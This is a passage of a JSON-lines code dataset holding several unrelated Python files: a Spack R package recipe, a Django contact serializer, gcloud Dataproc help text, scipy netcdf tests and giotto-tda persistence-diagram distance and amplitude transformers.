result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ImageDetectionResultDetailPolitics):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a305242a09f192c3cb9515271fa7ceb5357e232", "content": "# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack import *\n\n\nclass RTfmpvalue(RPackage):\n \"\"\"In putative Transcription Factor Binding Sites (TFBSs) identification\n from sequence/alignments, we are interested in the significance of\n certain match score. TFMPvalue provides the accurate calculation of\n P-value with score threshold for Position Weight Matrices, or the score\n with given P-value. 
This package is an interface to code originally\n made available by Helene Touzet and Jean-Stephane Varre, 2007,\n Algorithms Mol Biol:2, 15.\"\"\"\n\n homepage = \"https://github.com/ge11232002/TFMPvalue\"\n url = \"https://cran.rstudio.com/src/contrib/TFMPvalue_0.0.6.tar.gz\"\n list_url = \"https://cran.rstudio.com/src/contrib/Archive/TFMPvalue\"\n\n version('0.0.6', '69fdf4f9b9a0f408a5cee9ce34bea261')\n\n depends_on('r-rcpp@0.11.1:', type=('build', 'run'))\n"} {"ext": "py", "sha": "1a30537e7480b0064fca0d62c9bb729f31c21ef4", "content": "https://forms.gle/3jisA75mp56U2F4L6\nhttps://docs.google.com/spreadsheets/d/e/2PACX-1vTUSn1L4ChdUQeJSx2ufan1h9AhHzKEqPwBZwYmigstcfylLoxdn50Ndz_SF1cSwKFAD9Pw1rPEfo6t/pubhtml"} {"ext": "py", "sha": "1a3053a65b79a4453d2e85f91bf7be515d587ce4", "content": "\"\"\" Contact serializers. \"\"\"\n\n# Django REST Framework\nfrom ast import Num\nfrom statistics import mode\nfrom rest_framework import serializers\n\n\n# Models\nfrom coeadmin.record.models.person import Person\nfrom coeadmin.record.models.contact import Contact\n\n# Serializers\nfrom coeadmin.record.serializers.person import PersonModelSerializer\n\n\n# Utilities\nfrom datetime import datetime, timedelta\n\nclass ContactModelSerializer(serializers.ModelSerializer):\n \"\"\" Contact serializer. \"\"\"\n\n person = PersonModelSerializer(allow_null=True)\n\n class Meta:\n \"\"\" Meta class. \"\"\"\n\n model = Contact\n fields = (\n 'id',\n 'person',\n 'contact_date',\n 'contact_type',\n 'insolation_days',\n 'high_insulation_date',\n 'is_active',\n )\n read_only_fields = (\n 'id',\n 'person'\n )\n\n\nclass AddContactSerializer(serializers.ModelSerializer):\n \"\"\" Add contact serializer. \"\"\"\n class Meta:\n \"\"\" Meta class. \"\"\"\n model = Contact\n fields = (\n 'id',\n 'person',\n 'contact_date',\n 'contact_type',\n 'insolation_days',\n 'high_insulation_date',\n 'is_active',\n )\n\n\n def create(self, validate_data):\n \"\"\" Create the contact. \"\"\"\n\n positive = self.context['positive']\n person = validate_data['person']\n days = validate_data['insolation_days']\n contact_date= validate_data['contact_date'],\n\n contact = Contact.objects.create(\n positive=positive,\n person=person,\n contact_date= validate_data['contact_date'],\n contact_type= validate_data['contact_type'],\n insolation_days=days,\n high_insulation_date=contact_date[0] + timedelta(days=days),\n )\n\n return contact"} {"ext": "py", "sha": "1a3053bf5ebef03ef1571f606882f58543820372", "content": "# Copyright 2015 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"The command group for cloud dataproc operations.\"\"\"\n\nfrom googlecloudsdk.calliope import base\n\n\nclass Operations(base.Group):\n \"\"\"View and manage Google Cloud Dataproc operations.\"\"\"\n\n detailed_help = {\n 'DESCRIPTION': '{description}',\n 'EXAMPLES': \"\"\"\\\n To cancel an active operation, run:\n\n $ {command} cancel operation_id\n\n To view the details of an operation, run:\n\n $ {command} describe operation_id\n\n To see the list of all operations, run:\n\n $ {command} list\n\n To delete the record of an inactive operation, run:\n\n $ {command} delete operation_id\n \"\"\",\n }\n"} {"ext": "py", "sha": "1a3053e21bd3e36feaff15231bc4c71fec1fef21", "content": "''' Tests for netcdf '''\nfrom __future__ import division, print_function, absolute_import\n\nimport os\nfrom os.path import join as pjoin, dirname\nimport shutil\nimport tempfile\nimport warnings\nfrom io import BytesIO\nfrom glob import glob\nfrom contextlib import contextmanager\n\nimport numpy as np\nfrom numpy.testing import (assert_, assert_allclose, assert_raises,\n assert_equal, run_module_suite)\n\nfrom scipy.io.netcdf import netcdf_file\n\nfrom scipy._lib._tmpdirs import in_tempdir\n\nTEST_DATA_PATH = pjoin(dirname(__file__), 'data')\n\nN_EG_ELS = 11 # number of elements for example variable\nVARTYPE_EG = 'b' # var type for example variable\n\n\n@contextmanager\ndef make_simple(*args, **kwargs):\n f = netcdf_file(*args, **kwargs)\n f.history = 'Created for a test'\n f.createDimension('time', N_EG_ELS)\n time = f.createVariable('time', VARTYPE_EG, ('time',))\n time[:] = np.arange(N_EG_ELS)\n time.units = 'days since 2008-01-01'\n f.flush()\n yield f\n f.close()\n\n\ndef check_simple(ncfileobj):\n '''Example fileobj tests '''\n assert_equal(ncfileobj.history, b'Created for a test')\n time = ncfileobj.variables['time']\n assert_equal(time.units, b'days since 2008-01-01')\n assert_equal(time.shape, (N_EG_ELS,))\n assert_equal(time[-1], N_EG_ELS-1)\n\ndef assert_mask_matches(arr, expected_mask):\n '''\n Asserts that the mask of arr is effectively the same as expected_mask.\n\n In contrast to numpy.ma.testutils.assert_mask_equal, this function allows\n testing the 'mask' of a standard numpy array (the mask in this case is treated\n as all False).\n\n Parameters\n ----------\n arr: ndarray or MaskedArray\n Array to test.\n expected_mask: array_like of booleans\n A list giving the expected mask.\n '''\n\n mask = np.ma.getmaskarray(arr)\n assert_equal(mask, expected_mask)\n\n\ndef test_read_write_files():\n # test round trip for example file\n cwd = os.getcwd()\n try:\n tmpdir = tempfile.mkdtemp()\n os.chdir(tmpdir)\n with make_simple('simple.nc', 'w') as f:\n pass\n # read the file we just created in 'a' mode\n with netcdf_file('simple.nc', 'a') as f:\n check_simple(f)\n # add something\n f._attributes['appendRan'] = 1\n\n # To read the NetCDF file we just created::\n with netcdf_file('simple.nc') as f:\n # Using mmap is the default\n 
assert_(f.use_mmap)\n check_simple(f)\n assert_equal(f._attributes['appendRan'], 1)\n\n # Read it in append (and check mmap is off)\n with netcdf_file('simple.nc', 'a') as f:\n assert_(not f.use_mmap)\n check_simple(f)\n assert_equal(f._attributes['appendRan'], 1)\n\n # Now without mmap\n with netcdf_file('simple.nc', mmap=False) as f:\n # Using mmap is the default\n assert_(not f.use_mmap)\n check_simple(f)\n\n # To read the NetCDF file we just created, as file object, no\n # mmap. When n * n_bytes(var_type) is not divisible by 4, this\n # raised an error in pupynere 1.0.12 and scipy rev 5893, because\n # calculated vsize was rounding up in units of 4 - see\n # http://www.unidata.ucar.edu/software/netcdf/docs/netcdf.html\n with open('simple.nc', 'rb') as fobj:\n with netcdf_file(fobj) as f:\n # by default, don't use mmap for file-like\n assert_(not f.use_mmap)\n check_simple(f)\n\n # Read file from fileobj, with mmap\n with open('simple.nc', 'rb') as fobj:\n with netcdf_file(fobj, mmap=True) as f:\n assert_(f.use_mmap)\n check_simple(f)\n\n # Again read it in append mode (adding another att)\n with open('simple.nc', 'r+b') as fobj:\n with netcdf_file(fobj, 'a') as f:\n assert_(not f.use_mmap)\n check_simple(f)\n f.createDimension('app_dim', 1)\n var = f.createVariable('app_var', 'i', ('app_dim',))\n var[:] = 42\n\n # And... check that app_var made it in...\n with netcdf_file('simple.nc') as f:\n check_simple(f)\n assert_equal(f.variables['app_var'][:], 42)\n\n except:\n os.chdir(cwd)\n shutil.rmtree(tmpdir)\n raise\n os.chdir(cwd)\n shutil.rmtree(tmpdir)\n\n\ndef test_read_write_sio():\n eg_sio1 = BytesIO()\n with make_simple(eg_sio1, 'w') as f1:\n str_val = eg_sio1.getvalue()\n\n eg_sio2 = BytesIO(str_val)\n with netcdf_file(eg_sio2) as f2:\n check_simple(f2)\n\n # Test that error is raised if attempting mmap for sio\n eg_sio3 = BytesIO(str_val)\n assert_raises(ValueError, netcdf_file, eg_sio3, 'r', True)\n # Test 64-bit offset write / read\n eg_sio_64 = BytesIO()\n with make_simple(eg_sio_64, 'w', version=2) as f_64:\n str_val = eg_sio_64.getvalue()\n\n eg_sio_64 = BytesIO(str_val)\n with netcdf_file(eg_sio_64) as f_64:\n check_simple(f_64)\n assert_equal(f_64.version_byte, 2)\n # also when version 2 explicitly specified\n eg_sio_64 = BytesIO(str_val)\n with netcdf_file(eg_sio_64, version=2) as f_64:\n check_simple(f_64)\n assert_equal(f_64.version_byte, 2)\n\n\ndef test_read_example_data():\n # read any example data files\n for fname in glob(pjoin(TEST_DATA_PATH, '*.nc')):\n with netcdf_file(fname, 'r') as f:\n pass\n with netcdf_file(fname, 'r', mmap=False) as f:\n pass\n\n\ndef test_itemset_no_segfault_on_readonly():\n # Regression test for ticket #1202.\n # Open the test file in read-only mode.\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n filename = pjoin(TEST_DATA_PATH, 'example_1.nc')\n with netcdf_file(filename, 'r') as f:\n time_var = f.variables['time']\n\n # time_var.assignValue(42) should raise a RuntimeError--not seg. 
fault!\n assert_raises(RuntimeError, time_var.assignValue, 42)\n\n\ndef test_write_invalid_dtype():\n dtypes = ['int64', 'uint64']\n if np.dtype('int').itemsize == 8: # 64-bit machines\n dtypes.append('int')\n if np.dtype('uint').itemsize == 8: # 64-bit machines\n dtypes.append('uint')\n\n with netcdf_file(BytesIO(), 'w') as f:\n f.createDimension('time', N_EG_ELS)\n for dt in dtypes:\n assert_raises(ValueError, f.createVariable, 'time', dt, ('time',))\n\n\ndef test_flush_rewind():\n stream = BytesIO()\n with make_simple(stream, mode='w') as f:\n x = f.createDimension('x',4)\n v = f.createVariable('v', 'i2', ['x'])\n v[:] = 1\n f.flush()\n len_single = len(stream.getvalue())\n f.flush()\n len_double = len(stream.getvalue())\n\n assert_(len_single == len_double)\n\n\ndef test_dtype_specifiers():\n # Numpy 1.7.0-dev had a bug where 'i2' wouldn't work.\n # Specifying np.int16 or similar only works from the same commit as this\n # comment was made.\n with make_simple(BytesIO(), mode='w') as f:\n f.createDimension('x',4)\n f.createVariable('v1', 'i2', ['x'])\n f.createVariable('v2', np.int16, ['x'])\n f.createVariable('v3', np.dtype(np.int16), ['x'])\n\n\ndef test_ticket_1720():\n io = BytesIO()\n\n items = [0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n\n with netcdf_file(io, 'w') as f:\n f.history = 'Created for a test'\n f.createDimension('float_var', 10)\n float_var = f.createVariable('float_var', 'f', ('float_var',))\n float_var[:] = items\n float_var.units = 'metres'\n f.flush()\n contents = io.getvalue()\n\n io = BytesIO(contents)\n with netcdf_file(io, 'r') as f:\n assert_equal(f.history, b'Created for a test')\n float_var = f.variables['float_var']\n assert_equal(float_var.units, b'metres')\n assert_equal(float_var.shape, (10,))\n assert_allclose(float_var[:], items)\n\n\ndef test_mmaps_segfault():\n filename = pjoin(TEST_DATA_PATH, 'example_1.nc')\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"error\")\n with netcdf_file(filename, mmap=True) as f:\n x = f.variables['lat'][:]\n # should not raise warnings\n del x\n\n def doit():\n with netcdf_file(filename, mmap=True) as f:\n return f.variables['lat'][:]\n\n # should not crash\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n x = doit()\n x.sum()\n\n\ndef test_zero_dimensional_var():\n io = BytesIO()\n with make_simple(io, 'w') as f:\n v = f.createVariable('zerodim', 'i2', [])\n # This is checking that .isrec returns a boolean - don't simplify it\n # to 'assert not ...'\n assert v.isrec is False, v.isrec\n f.flush()\n\n\ndef test_byte_gatts():\n # Check that global \"string\" atts work like they did before py3k\n # unicode and general bytes confusion\n with in_tempdir():\n filename = 'g_byte_atts.nc'\n f = netcdf_file(filename, 'w')\n f._attributes['holy'] = b'grail'\n f._attributes['witch'] = 'floats'\n f.close()\n f = netcdf_file(filename, 'r')\n assert_equal(f._attributes['holy'], b'grail')\n assert_equal(f._attributes['witch'], b'floats')\n f.close()\n\n\ndef test_open_append():\n # open 'w' put one attr\n with in_tempdir():\n filename = 'append_dat.nc'\n f = netcdf_file(filename, 'w')\n f._attributes['Kilroy'] = 'was here'\n f.close()\n\n # open again in 'a', read the att and add a new one\n f = netcdf_file(filename, 'a')\n assert_equal(f._attributes['Kilroy'], b'was here')\n f._attributes['naughty'] = b'Zoot'\n f.close()\n\n # open yet again in 'r' and check both atts\n f = netcdf_file(filename, 'r')\n assert_equal(f._attributes['Kilroy'], b'was here')\n assert_equal(f._attributes['naughty'], 
b'Zoot')\n f.close()\n\n\ndef test_append_recordDimension(): \n dataSize = 100 \n \n with in_tempdir():\n # Create file with record time dimension\n with netcdf_file('withRecordDimension.nc', 'w') as f:\n f.createDimension('time', None)\n f.createVariable('time', 'd', ('time',))\n f.createDimension('x', dataSize)\n x = f.createVariable('x', 'd', ('x',))\n x[:] = np.array(range(dataSize))\n f.createDimension('y', dataSize)\n y = f.createVariable('y', 'd', ('y',))\n y[:] = np.array(range(dataSize))\n f.createVariable('testData', 'i', ('time', 'x', 'y')) \n f.flush()\n f.close() \n \n for i in range(2): \n # Open the file in append mode and add data \n with netcdf_file('withRecordDimension.nc', 'a') as f:\n f.variables['time'].data = np.append(f.variables[\"time\"].data, i)\n f.variables['testData'][i, :, :] = np.ones((dataSize, dataSize))*i\n f.flush()\n \n # Read the file and check that append worked\n with netcdf_file('withRecordDimension.nc') as f: \n assert_equal(f.variables['time'][-1], i)\n assert_equal(f.variables['testData'][-1, :, :].copy(), np.ones((dataSize, dataSize))*i)\n assert_equal(f.variables['time'].data.shape[0], i+1)\n assert_equal(f.variables['testData'].data.shape[0], i+1)\n \n # Read the file and check that 'data' was not saved as user defined\n # attribute of testData variable during append operation\n with netcdf_file('withRecordDimension.nc') as f:\n with assert_raises(KeyError) as ar: \n f.variables['testData']._attributes['data']\n ex = ar.exception\n assert_equal(ex.args[0], 'data')\n\ndef test_maskandscale():\n t = np.linspace(20, 30, 15)\n t[3] = 100\n tm = np.ma.masked_greater(t, 99)\n fname = pjoin(TEST_DATA_PATH, 'example_2.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n Temp = f.variables['Temperature']\n assert_equal(Temp.missing_value, 9999)\n assert_equal(Temp.add_offset, 20)\n assert_equal(Temp.scale_factor, np.float32(0.01))\n found = Temp[:].compressed()\n del Temp # Remove ref to mmap, so file can be closed.\n expected = np.round(tm.compressed(), 2)\n assert_allclose(found, expected)\n\n with in_tempdir():\n newfname = 'ms.nc'\n f = netcdf_file(newfname, 'w', maskandscale=True)\n f.createDimension('Temperature', len(tm))\n temp = f.createVariable('Temperature', 'i', ('Temperature',))\n temp.missing_value = 9999\n temp.scale_factor = 0.01\n temp.add_offset = 20\n temp[:] = tm\n f.close()\n\n with netcdf_file(newfname, maskandscale=True) as f:\n Temp = f.variables['Temperature']\n assert_equal(Temp.missing_value, 9999)\n assert_equal(Temp.add_offset, 20)\n assert_equal(Temp.scale_factor, np.float32(0.01))\n expected = np.round(tm.compressed(), 2)\n found = Temp[:].compressed()\n del Temp\n assert_allclose(found, expected)\n\n\n# ------------------------------------------------------------------------\n# Test reading with masked values (_FillValue / missing_value)\n# ------------------------------------------------------------------------\n\ndef test_read_withValuesNearFillValue():\n # Regression test for ticket #5626\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var1_fillval0'][:]\n assert_mask_matches(vardata, [False, True, False])\n\ndef test_read_withNoFillValue():\n # For a variable with no fill value, reading data with maskandscale=True\n # should return unmasked data\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var2_noFillval'][:]\n assert_mask_matches(vardata, 
[False, False, False])\n assert_equal(vardata, [1,2,3])\n\ndef test_read_withFillValueAndMissingValue():\n # For a variable with both _FillValue and missing_value, the _FillValue\n # should be used\n IRRELEVANT_VALUE = 9999\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var3_fillvalAndMissingValue'][:]\n assert_mask_matches(vardata, [True, False, False])\n assert_equal(vardata, [IRRELEVANT_VALUE, 2, 3])\n\ndef test_read_withMissingValue():\n # For a variable with missing_value but not _FillValue, the missing_value\n # should be used\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var4_missingValue'][:]\n assert_mask_matches(vardata, [False, True, False])\n\ndef test_read_withFillValNaN():\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var5_fillvalNaN'][:]\n assert_mask_matches(vardata, [False, True, False])\n\ndef test_read_withChar():\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var6_char'][:]\n assert_mask_matches(vardata, [False, True, False])\n\ndef test_read_with2dVar():\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var7_2d'][:]\n assert_mask_matches(vardata, [[True, False], [False, False], [False, True]])\n\ndef test_read_withMaskAndScaleFalse():\n # If a variable has a _FillValue (or missing_value) attribute, but is read\n # with maskandscale set to False, the result should be unmasked\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n # Open file with mmap=False to avoid problems with closing a mmap'ed file\n # when arrays referring to its data still exist:\n with netcdf_file(fname, maskandscale=False, mmap=False) as f:\n vardata = f.variables['var3_fillvalAndMissingValue'][:]\n assert_mask_matches(vardata, [False, False, False])\n assert_equal(vardata, [1, 2, 3])\n\nif __name__ == \"__main__\":\n run_module_suite()\n"} {"ext": "py", "sha": "1a305550a608959717cee6136d21d1063fef06a4", "content": "# License: Apache 2.0\n\nimport numpy as np\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.utils.validation import check_is_fitted\n\nfrom ._metrics import _parallel_pairwise, _parallel_amplitude\nfrom ._utils import _discretize\nfrom ..utils.validation import check_diagram, validate_params, \\\n validate_metric_params\n\n\nclass PairwiseDistance(BaseEstimator, TransformerMixin):\n \"\"\"`Distances `_ between pairs of persistence\n diagrams, constructed from the distances between their respective\n subdiagrams with constant homology dimension.\n\n Given two collections of persistence diagrams consisting of\n birth-death-dimension triples [b, d, q], a collection of distance\n matrices or a single distance matrix between pairs of diagrams is\n calculated according to the following steps:\n\n 1. All diagrams are partitioned into subdiagrams corresponding to\n distinct homology dimensions.\n 2. Pairwise distances between subdiagrams of equal homology\n dimension are calculated according to the parameters `metric` and\n `metric_params`. This gives a collection of distance matrices,\n :math:`\\\\mathbf{D} = (D_{q_1}, \\\\ldots, D_{q_n})`.\n 3. 
The final result is either :math:`\\\\mathbf{D}` itself as a\n three-dimensional array, or a single distance matrix constructed\n by taking norms of the vectors of distances between diagram pairs.\n\n Parameters\n ----------\n metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \\\n ``'betti'`` | ``'heat'``, optional, default: ``'bottleneck'``\n Distance or dissimilarity function between subdiagrams:\n\n - ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named\n perfect-matching--based notions of distance.\n - ``'landscape'`` refers to the :math:`L^p` distance between\n persistence landscapes.\n - ``'betti'`` refers to the :math:`L^p` distance between Betti curves.\n - ``'heat'`` refers to the :math:`L^p` distance between\n Gaussian-smoothed diagrams.\n\n metric_params : dict or None, optional, default: ``None``\n Additional keyword arguments for the metric function:\n\n - If ``metric == 'bottleneck'`` the only argument is `delta` (float,\n default: ``0.01``). When equal to ``0.``, an exact algorithm is\n used; otherwise, a faster approximate algorithm is used.\n - If ``metric == 'wasserstein'`` the available arguments are `p`\n (int, default: ``2``) and `delta` (float, default: ``0.01``).\n Unlike the case of ``'bottleneck'``, `delta` cannot be set to\n ``0.`` and an exact algorithm is not available.\n - If ``metric == 'betti'`` the available arguments are `p` (float,\n default: ``2.``) and `n_values` (int, default: ``100``).\n - If ``metric == 'landscape'`` the available arguments are `p`\n (float, default: ``2.``), `n_values` (int, default: ``100``) and\n `n_layers` (int, default: ``1``).\n - If ``metric == 'heat'`` the available arguments are `p`\n (float, default: ``2.``), `sigma` (float, default: ``1.``) and\n `n_values` (int, default: ``100``).\n\n order : float or None, optional, default: ``2.``\n If ``None``, :meth:`transform` returns for each pair of diagrams a\n vector of distances corresponding to the dimensions in\n :attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of\n these vectors with :math:`p` equal to `order` is taken.\n\n n_jobs : int or None, optional, default: ``None``\n The number of jobs to use for the computation. ``None`` means 1 unless\n in a :obj:`joblib.parallel_backend` context. ``-1`` means using all\n processors.\n\n Attributes\n ----------\n effective_metric_params_ : dict\n Dictionary containing all information present in `metric_params` as\n well as on any relevant quantities computed in :meth:`fit`.\n\n homology_dimensions_ : list\n Homology dimensions seen in :meth:`fit`, sorted in ascending order.\n\n See also\n --------\n Amplitude, BettiCurve, PersistenceLandscape, HeatKernel, \\\n giotto.homology.VietorisRipsPersistence\n\n Notes\n -----\n To compute distances without first splitting the computation between\n different homology dimensions, data should be first transformed by an\n instance of :class:`ForgetDimension`.\n\n `Hera `_ is used as a C++ backend\n for computing bottleneck and Wasserstein distances between persistence\n diagrams.\n\n \"\"\"\n _hyperparameters = {'order': [float, (1, np.inf)]}\n\n def __init__(self, metric='landscape', metric_params=None, order=2.,\n n_jobs=None):\n self.metric = metric\n self.metric_params = metric_params\n self.order = order\n self.n_jobs = n_jobs\n\n def fit(self, X, y=None):\n \"\"\"Store all observed homology dimensions in\n :attr:`homology_dimensions_` and compute\n :attr:`effective_metric_params`. 
Then, return the estimator.\n\n This method is there to implement the usual scikit-learn API and hence\n work in pipelines.\n\n Parameters\n ----------\n X : ndarray, shape (n_samples_fit, n_features, 3)\n Input data. Array of persistence diagrams, each a collection of\n triples [b, d, q] representing persistent topological features\n through their birth (b), death (d) and homology dimension (q).\n\n y : None\n There is no need for a target in a transformer, yet the pipeline\n API requires this parameter.\n\n Returns\n -------\n self : object\n\n \"\"\"\n X = check_diagram(X)\n if self.metric_params is None:\n self.effective_metric_params_ = {}\n else:\n self.effective_metric_params_ = self.metric_params.copy()\n\n hyperparameters = self.get_params().copy()\n if self.order is not None:\n if isinstance(self.order, int):\n hyperparameters['order'] = float(self.order)\n else:\n hyperparameters['order'] = 1. # Automatically pass validate_params\n\n validate_params(hyperparameters, self._hyperparameters)\n validate_metric_params(self.metric, self.effective_metric_params_)\n\n self.homology_dimensions_ = sorted(set(X[0, :, 2]))\n\n if self.metric in ['landscape', 'heat', 'betti']:\n self.effective_metric_params_['samplings'], \\\n self.effective_metric_params_['step_sizes'] = \\\n _discretize(X, **self.effective_metric_params_)\n\n self._X = X\n return self\n\n def transform(self, X, y=None):\n \"\"\"Computes a distance or vector of distances between the diagrams in\n `X` and the diagrams seen in :meth:`fit`.\n\n Parameters\n ----------\n X : ndarray, shape (n_samples, n_features, 3)\n Input data. Array of persistence diagrams, each a collection of\n triples [b, d, q] representing persistent topological features\n through their birth (b), death (d) and homology dimension (q).\n\n y : None\n There is no need for a target in a transformer, yet the pipeline\n API requires this parameter.\n\n Returns\n -------\n Xt : ndarray, shape (n_samples_fit, n_samples, n_homology_dimensions) \\\n if `order` is ``None``, else (n_samples_fit, n_samples)\n Distance matrix or collection of distance matrices between\n diagrams in `X` and diagrams seen in :meth:`fit`. In the\n second case, index i along axis 2 corresponds to the i-th\n homology dimension in :attr:`homology_dimensions_`.\n\n \"\"\"\n check_is_fitted(self, ['effective_metric_params_',\n 'homology_dimensions_'])\n X = check_diagram(X)\n\n if np.array_equal(X, self._X):\n X2 = None\n else:\n X2 = X\n\n Xt = _parallel_pairwise(self._X, X2, self.metric,\n self.effective_metric_params_,\n self.homology_dimensions_,\n self.n_jobs)\n if self.order is not None:\n Xt = np.linalg.norm(Xt, axis=2, ord=self.order)\n\n return Xt\n\n\nclass Amplitude(BaseEstimator, TransformerMixin):\n \"\"\"`Amplitudes `_ of persistence diagrams,\n constructed from the amplitudes of their subdiagrams with constant\n homology dimension.\n\n Given a single persistence diagram consisting of birth-death-dimension\n triples [b, d, q], a vector of amplitudes or a single scalar amplitude is\n calculated according to the following steps:\n\n 1. All diagrams are partitioned into subdiagrams corresponding to\n distinct homology dimensions.\n 2. The amplitude of each subdiagram is calculated according to the\n parameters `metric` and `metric_params`. This gives a vector of\n amplitudes, :math:`\\\\mathbf{a} = (a_{q_1}, \\\\ldots, a_{q_n})`.\n 3. 
The final result is either :math:`\\\\mathbf{a}` itself or\n a norm of :math:`\\\\mathbf{a}`.\n\n Parameters\n ----------\n metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \\\n ``'betti'`` | ``'heat'``, optional, default: ``'bottleneck'``\n Distance or dissimilarity function used to define the amplitude of\n a subdiagram as its distance from the diagonal diagram:\n\n - ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named\n perfect-matching--based notions of distance.\n - ``'landscape'`` refers to the :math:`L^p` distance between\n persistence landscapes.\n - ``'betti'`` refers to the :math:`L^p` distance between Betti curves.\n - ``'heat'`` refers to the :math:`L^p` distance between\n Gaussian-smoothed diagrams.\n\n metric_params : dict or None, optional, default: ``None``\n Additional keyword arguments for the metric function:\n\n - If ``metric == 'bottleneck'`` there are no available arguments.\n - If ``metric == 'wasserstein'`` the only argument is `p` (int,\n default: ``2``).\n - If ``metric == 'betti'`` the available arguments are `p` (float,\n default: ``2.``) and `n_values` (int, default: ``100``).\n - If ``metric == 'landscape'`` the available arguments are `p`\n (float, default: ``2.``), `n_values` (int, default: ``100``) and\n `n_layers` (int, default: ``1``).\n - If ``metric == 'heat'`` the available arguments are `p` (float,\n default: ``2.``), `sigma` (float, default: ``1.``) and `n_values`\n (int, default: ``100``).\n\n order : float or None, optional, default: ``2.``\n If ``None``, :meth:`transform` returns for each diagram a vector of\n amplitudes corresponding to the dimensions in\n :attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of\n these vectors with :math:`p` equal to `order` is taken.\n\n n_jobs : int or None, optional, default: ``None``\n The number of jobs to use for the computation. ``None`` means 1 unless\n in a :obj:`joblib.parallel_backend` context. ``-1`` means using all\n processors.\n\n Attributes\n ----------\n effective_metric_params_ : dict\n Dictionary containing all information present in `metric_params` as\n well as on any relevant quantities computed in :meth:`fit`.\n\n homology_dimensions_ : list\n Homology dimensions seen in :meth:`fit`, sorted in ascending order.\n\n See also\n --------\n PairwiseDistance, Scaler, Filtering, \\\n BettiCurve, PersistenceLandscape, \\\n HeatKernel, giotto.homology.VietorisRipsPersistence\n\n Notes\n -----\n To compute amplitudes without first splitting the computation between\n different homology dimensions, data should be first transformed by an\n instance of :class:`ForgetDimension`.\n\n \"\"\"\n _hyperparameters = {'order': [float, (1, np.inf)]}\n\n def __init__(self, metric='landscape', metric_params=None, order=2.,\n n_jobs=None):\n self.metric = metric\n self.metric_params = metric_params\n self.order = order\n self.n_jobs = n_jobs\n\n def fit(self, X, y=None):\n \"\"\"Store all observed homology dimensions in\n :attr:`homology_dimensions_` and compute\n :attr:`effective_metric_params`. Then, return the estimator.\n\n This method is there to implement the usual scikit-learn API and hence\n work in pipelines.\n\n Parameters\n ----------\n X : ndarray, shape (n_samples, n_features, 3)\n Input data. 
Array of persistence diagrams, each a collection of\n triples [b, d, q] representing persistent topological features\n through their birth (b), death (d) and homology dimension (q).\n\n y : None\n There is no need for a target in a transformer, yet the pipeline\n API requires this parameter.\n\n Returns\n -------\n self : object\n\n \"\"\"\n if self.metric_params is None:\n self.effective_metric_params_ = {}\n else:\n self.effective_metric_params_ = self.metric_params.copy()\n\n hyperparameters = self.get_params().copy()\n if self.order is not None:\n if isinstance(self.order, int):\n hyperparameters['order'] = float(self.order)\n else:\n hyperparameters['order'] = 1. # Automatically pass validate_params\n\n validate_params(hyperparameters, self._hyperparameters)\n validate_metric_params(self.metric, self.effective_metric_params_)\n X = check_diagram(X)\n self.homology_dimensions_ = sorted(set(X[0, :, 2]))\n\n if self.metric in ['landscape', 'heat', 'betti']:\n self.effective_metric_params_['samplings'], \\\n self.effective_metric_params_['step_sizes'] = \\\n _discretize(X, **self.effective_metric_params_)\n\n return self\n\n def transform(self, X, y=None):\n \"\"\"Compute the amplitudes or amplitude vectors of diagrams in `X`.\n\n Parameters\n ----------\n X : ndarray, shape (n_samples, n_features, 3)\n Input data. Array of persistence diagrams, each a collection of\n triples [b, d, q] representing persistent topological features\n through their birth (b), death (d) and homology dimension (q).\n\n y : None\n There is no need for a target in a transformer, yet the pipeline\n API requires this parameter.\n\n Returns\n -------\n Xt : ndarray, shape (n_samples, n_homology_dimensions) if `order` \\\n is ``None``, else (n_samples, 1)\n Amplitudes or amplitude vectors of the 